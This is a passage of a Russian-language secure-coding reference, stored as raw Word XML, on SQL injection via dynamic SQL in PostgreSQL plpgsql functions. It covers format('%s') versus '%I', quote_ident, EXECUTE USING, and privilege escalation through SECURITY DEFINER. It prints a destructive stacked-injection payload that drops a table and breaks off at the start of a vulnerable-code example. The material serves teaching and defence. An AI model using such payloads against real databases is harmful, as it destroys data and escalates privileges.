                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>identifier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CFA1AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>concat без quote_ident + case bypass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79F9F5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>quote_ident</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> + ASCII-check</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="0E9A5E83"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759DA7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.16.3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2DC683" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>EXECUTE ... USING $1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258E4C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>value (bind)</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D0B302" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>USING для identifier (не работает)</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700C73" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">USING для значений, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>%I</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> для имён</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="6AA31949"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288D0C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.16.4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B7EDCF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>`EXECUTE '...' \</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2AFFFC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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AB1B98" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>x \</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4E8724" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>\</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="65500BF3"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0E01FB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.16.5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6EA258" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SECURITY DEFINER + dynamic SQL</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56F199" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>privilege elevation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7F3613" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>dynamic SQL внутри SD-функции</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4A5948" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">wrap всех 3.16.1–3.16.4 + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SET search_path</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4AE75F97" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Граница с другими категориями</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294AF66E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.14.2 ORDER BY column_name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — application-side analog (то же бременности bind-протокола, но в Python/Java коде). Граница: 3.14.2 — application; 3.16 — серверный plpgsql.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDC93E2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 Stacked queries</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — payload в 3.16.1/3.16.4 — это классический stacked-injection (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'users; DROP TABLE audit; --'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>внутри plpgsql EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, который </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>всегда</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> идёт через simple-protocol-equivalent (sequential statements в текстовом SQL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1822083D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.6 SECURITY DEFINER + SET search_path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — параллельный класс уязвимостей в SECURITY DEFINER (search_path hijack); 3.16.5 — dynamic SQL injection в SD-функции. Граница: 3.13.6 — hijack unqualified имени; 3.16.5 — injection в text dynamic SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA2DC68" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.1 / 3.7.2 / 3.7.3 RCE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — successful 3.16.5 payload в superuser-owned SD-функции эскалирует в полный RCE через те же векторы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEE703A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 quote_ident, quote_literal, format('%I')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общая reference по защитным функциям; 3.16 — детали в attack-context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C543104" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Карта подразделов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E95F64" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('%s')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('%I')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — основная карточка R18, прямая identifier injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FD3940" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и ограничения — case-folding bypass whitelist, не для значений</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388A0F63" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE ... USING</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — безопасный pattern для значений, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не работает</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для identifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237D1937" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Конкатенация через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — самый прямой антипаттерн</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113D1B11" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SECURITY DEFINER + dynamic SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — комбо: identifier injection × elevation prev (5.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7044049C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Общая модель угроз</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C71BFAB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Все пять подразделов 3.16 — варианты одной ошибки: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dynamic SQL строится из user-controlled identifier без `%I`/`quote_ident`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Причина — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>синтаксическое ограничение PostgreSQL Wire Protocol</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D2EBA6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Bind-параметр </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> подставляется как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>, не как identifier. Это design-решение (binary-typed serialization).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A701C4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Identifier попадает в parse-tree на стадии </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Parse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, до Bind. Это означает, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>только текстовая подстановка возможна для identifier</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FB9A78" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. PostgreSQL предоставляет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('%I', ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> именно для безопасной текстовой подстановки — но разработчик </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>должен это вызвать</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C618E0A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Когда plpgsql функция работает в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SECURITY DEFINER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> контексте, payload эскалирует от «execute SQL as caller» до «execute SQL as function owner». В типичном multi-tenant сетапе owner таких функций — superuser или DBA, что превращает identifier-injection в полноценную privilege escalation chain. Это эквивалент 3.13.6 (search_path hijack), но через другой механизм — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с injection вместо unqualified name resolution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3592E210" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Стек примеров</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF754C8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Все примеры в 3.16 — на plpgsql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, не Python+SQLAlchemy. Причина (документирована в CLAUDE.md): инъекция серверная, язык приложения не важен — application-код выглядит как обычный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT my_function(:user_input)</w:t>
      </w:r>
      <w:r>
        <w:t>, вся уязвимость в теле функции. Показывать application-обёртку без plpgsql-body — это убрать сам объект уязвимости.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517C55BF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Где relevant, мы показываем minimal application-caller (FastAPI route, вызывающий функцию) — для context-а как именно user-input попадает в функцию.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F2591A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.16.1 format('%s') vs format('%I') (R18)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515116AE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PostgreSQL функция </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format(formatstr, args...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — стандартный способ построения dynamic SQL в plpgsql. Поддерживает три conversion specifiers: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`%s`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (string substitution </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>без quoting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`%I`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (identifier quoting — добавляет double-quotes и удваивает внутренние </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`%L`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (literal quoting — добавляет single-quotes, удваивает внутренние </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Базовая ошибка: разработчик пишет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('SELECT * FROM %s', tbl_name)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> подставляет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>сырую строку без quoting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tbl_name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> приходит от пользователя, payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'users; DROP TABLE audit; --'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> собирает stacked-injection внутри dynamic SQL. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R18 — это именно этот класс</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вместо </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для identifier, типичный mistake разработчиков, привыкших к C </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>printf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общая string).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE0020E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BB9BB1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Уязвимая функция: dynamic SELECT с переданным именем таблицы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5250AF83" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Owner функции: application_admin (имеет SELECT/INSERT/UPDATE/DELETE на все таблицы tenant-схем)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6A291A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
